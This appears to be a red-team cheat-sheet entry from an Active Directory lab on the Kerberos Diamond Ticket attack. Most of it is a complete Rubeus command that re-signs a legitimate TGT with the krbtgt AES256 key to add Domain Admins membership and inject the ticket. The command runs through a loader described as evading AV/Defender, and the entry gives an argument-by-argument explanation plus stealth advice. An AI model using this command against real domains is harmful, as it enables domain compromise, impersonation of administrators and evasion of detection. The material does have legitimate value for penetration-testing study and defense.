π Diamond Ticket
A modified legitimate TGT signed with the krbtgt AES256 key. Unlike the Golden Ticket, instead of forging a ticket from scratch, it takes a real TGT and modifies it to add privileged group memberships, making it stealthier and harder to detect β more OpSec safe than a Golden Ticket since the ticket originates from a legitimate Kerberos exchange. Requirements: - krbtgt AES256 key. - A valid TGT (obtained via TGT delegation). - Target Username and Relative ID (RID) (typically 500 for Administrator).
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args "diamond /krbkey:[HASH_KRBTGT_AES256] /tgtdeleg /enctype:aes /ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt"
Loader.exe: Runs Rubeus in memory (AV/Defender evasion).diamond: Modifies a legitimate TGT instead of forging one from scratch./krbkey: AES256 hash of the krbtgt account, used to re-sign the modified TGT./tgtdeleg: Automatically requests a delegable TGT from the current user session./enctype:aes: Uses AES encryption instead of RC4 (more OpSec safe)./ticketuser: Username to impersonate in the forged ticket./domain: Target domain./dc: Domain Controller to send the request to./ticketuserid: RID of the user to impersonate (500 = Administrator)./groups: Group memberships to include in the ticket (512 = Domain Admins)./createnetonly: Creates a sacrificialcmd.exeprocess with an isolated network identity (LUID)./show: Displays the newly created process window./ptt: Injects the ticket directly into the current session (Pass-the-Ticket attack).